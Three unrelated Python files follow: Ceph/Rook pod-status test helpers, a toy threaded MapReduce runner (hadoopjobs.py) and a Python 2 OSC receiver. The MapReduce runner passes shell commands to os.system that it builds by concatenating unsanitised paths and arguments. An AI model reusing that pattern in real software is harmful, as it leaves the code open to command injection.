if len(pods_not_ready) > 1:
logger.warning("More than one pod is not running")
return False
# if len(pods_not_ready) == 1
pod_not_ready = pods_not_ready[0]
pod_daemon_type = get_pod_ceph_daemon_type(pod_not_ready)
if pod_daemon_type == constants.MON_DAEMON:
logger.info(
f"One of the '{pod_daemon_type}' pods is not running, "
f"but all the other pods are running"
)
timeout = 1500
logger.info(
f"waiting another {timeout} seconds for all the pods to be running..."
)
are_pods_running = wait_for_pods_to_be_running(timeout=timeout, sleep=30)
if are_pods_running:
logger.info("All the pods are running")
return True
else:
logger.warning(
f"Not all the pods are in a running state after {timeout} seconds"
)
return False
else:
logger.warning(f"One of the '{pod_daemon_type}' pods is not running")
return False
def get_osd_pods_having_ids(osd_ids):
"""
Get the osd pods having specific ids
Args:
osd_ids (list): The list of the osd ids
Returns:
list: The osd pods having the osd ids
"""
# Convert it to set to reduce complexity
osd_ids_set = set(osd_ids)
osd_pods_having_ids = []
osd_pods = get_osd_pods()
for osd_pod in osd_pods:
if get_osd_pod_id(osd_pod) in osd_ids_set:
osd_pods_having_ids.append(osd_pod)
return osd_pods_having_ids
def get_pod_objs(
pod_names,
raise_pod_not_found_error=False,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
):
"""
Get the pod objects of the specified pod names
Args:
pod_names (list): The list of the pod names to get their pod objects
namespace (str): Name of cluster namespace(default: defaults.ROOK_CLUSTER_NAMESPACE)
raise_pod_not_found_error (bool): If True, it raises an exception, if one of the pods
in the pod names are not found. If False, it ignores the case of pod not found and
returns the pod objects of the rest of the pod names. The default value is False
Returns:
list: The pod objects of the specified pod names
Raises:
ResourceNotFoundError: If 'raise_pod_not_found_error' is True,
and not all the pod names were found
"""
# Convert it to set to reduce complexity
pod_names_set = set(pod_names)
pods = get_all_pods(namespace=namespace)
pod_objs_found = [p for p in pods if p.name in pod_names_set]
if len(pod_names) > len(pod_objs_found):
pod_names_found_set = {p.name for p in pod_objs_found}
pod_names_not_found = list(pod_names_set - pod_names_found_set)
error_message = f"Did not find the following pod names: {pod_names_not_found}"
if raise_pod_not_found_error:
raise ResourceNotFoundError(error_message)
else:
logger.info(error_message)
return pod_objs_found
def wait_for_change_in_pods_statuses(
pod_names,
current_statuses=None,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
timeout=300,
sleep=20,
):
"""
Wait for the pod statuses in a specific namespace to change.
Args:
pod_names (list): List of the pod names to check if their status changed.
namespace (str): the namespace of the pods
current_statuses (list): The current pod statuses. These are the pod statuses
to check if they changed during each iteration.
timeout (int): time to wait for pod statuses to change
sleep (int): Time in seconds to sleep between attempts
Returns:
bool: True, if the pod statuses have changed. False, otherwise
"""
if current_statuses is None:
# If 'current_statuses' is None, the default value will be the ready statuses
current_statuses = [constants.STATUS_RUNNING, constants.STATUS_COMPLETED]
try:
for pod_objs in TimeoutSampler(
timeout=timeout,
sleep=sleep,
func=get_pod_objs,
namespace=namespace,
pod_names=pod_names,
):
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
if len(pod_objs) < len(pod_names):
pod_names_found_set = {p.name for p in pod_objs}
pod_names_not_found = list(set(pod_names) - pod_names_found_set)
logger.info(f"Some of the pods have not found: {pod_names_not_found}")
return True
for p in pod_objs:
try:
pod_status = ocp_pod_obj.get_resource_status(p.name)
except CommandFailed as ex:
logger.info(
f"Can't get the status of the pod {p.name} due to the error: {ex}"
)
continue
if pod_status not in current_statuses:
logger.info(
f"The status of the pod '{p.name}' has changed to '{pod_status}'"
)
return True
except TimeoutExpiredError:
logging.info(f"The status of the pods did not change after {timeout} seconds")
return False
def get_rook_ceph_pod_names():
"""
Get all the rook ceph pod names
Returns:
list: List of the rook ceph pod names
"""
rook_ceph_pod_names = get_pod_name_by_pattern("rook-ceph-")
# Exclude the rook-ceph-tools pod because it is created by OCS and not by the rook-ceph operator
return [
pod_name
for pod_name in rook_ceph_pod_names
if not pod_name.startswith("rook-ceph-tools-")
]
def get_mon_pod_id(mon_pod):
"""
Get the mon pod id
Args:
mon_pod (ocs_ci.ocs.resources.pod.Pod): The mon pod object
Returns:
str: The mon pod id
"""
return mon_pod.get().get("metadata").get("labels").get("ceph_daemon_id")
|
hadoopjobs.py
|
import os,json,pathlib
import threading
def mapping(filen,i,splits,local_path_mapper,output,arguements):
a=filen[0]+'_'+str(i)+'.'+filen[1]
rep = len(splits[a])
inp = '-1'
for i in range(rep):
if not pathlib.Path(splits[a][i]).exists():
continue
else:
inp = splits[a][i]
break
if inp == "-1":
print("File is corrupted. Please re-upload input files.")
return
try:
os.system('cat ' + inp +' | python3 '+local_path_mapper+ " "+ arguements+ ' >'+output)
with open(output,'r') as f1,open('moutput.txt','a') as f2:
f2.writelines(f1.readlines())
except:
print("Mapper Path not Found.")
# Note: the 'with' statement above already closes f1 and f2, so no
# explicit close() calls are needed here.
def mapreduce(path_to_dataset,local_path_to_output,local_path_mapper,local_path_reducer,args,path_to_namenodes,fs_path):
arguements=""
for i in args:
arguements+=str(i)+" "
try:
with open(os.path.join(path_to_namenodes,'namenode.json'),'r') as f:
data = json.load(f)
except:
print("Cannot access Namenode.")
return
splits=data[fs_path+path_to_dataset]
# print(len(splits))
filename=path_to_dataset.split('/')
filen=filename[-1].split('.')
try:
with open('moutput.txt','w') as f1:
f1.write('')
except:
print("Error in storing mapper output.")
return
for i in range(1,len(splits)+1,2):
try:
t1 = threading.Thread(target=mapping, args=(filen,i,splits,local_path_mapper,"output.txt",arguements))
t1.start()
if(i+1<len(splits)+1):
t2 = threading.Thread(target=mapping, args=(filen,i+1,splits,local_path_mapper,"output2.txt",arguements))
t2.start()
t1.join()
try:
t2.join()
except:
pass
except:
print("Error was caused during Multithreading.")
try:
os.system("cat moutput.txt | sort -k 1,1 | python3 "+local_path_reducer+' >'+local_path_to_output)
os.remove("output.txt")
os.remove("output2.txt")
except:
print("Reducer Path not Found.")
|
osc_receive.py
|
import socket, OSC, re, time, threading, math
import event
class PiException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class OscReceive :
def __init__(self, port):
self.receive_address = '0.0.0.0', port  # Listen address (all interfaces) and incoming port
self.s = OSC.OSCServer(self.receive_address)
self.s.addDefaultHandlers()
self.setup("/test")
# Start OSCServer
print "\nStarting OSCServer. Use ctrl-C to quit."
self.st = threading.Thread( target = self.s.serve_forever )
self.st.start()
def setup(self, adr):
self.s.addMsgHandler(adr, self.callback)
print "Registered Callback-functions are :"
for addr in self.s.getOSCAddressSpace():
print addr
def callback(self, add, tags, stuff, source):
print add
event.bang(add, stuff)
def terminate(self):
print "\nClosing OSCServer."
self.s.close()
print "Waiting for Server-thread to finish"
self.st.join()
print "Done"
# Add a callback function with event.py as follows:
# import event
# def foo(vals):
# for val in vals:
# print val
# event.add("foo",foo)
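# A hedged usage sketch (the port and OSC address are arbitrary examples;
# this assumes the legacy Python 2 pyOSC package used above is installed):
#
# rx = OscReceive(8000)
# rx.setup("/pi/sensor")   # register an additional OSC address
# # ... run until done ...
# rx.terminate()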
|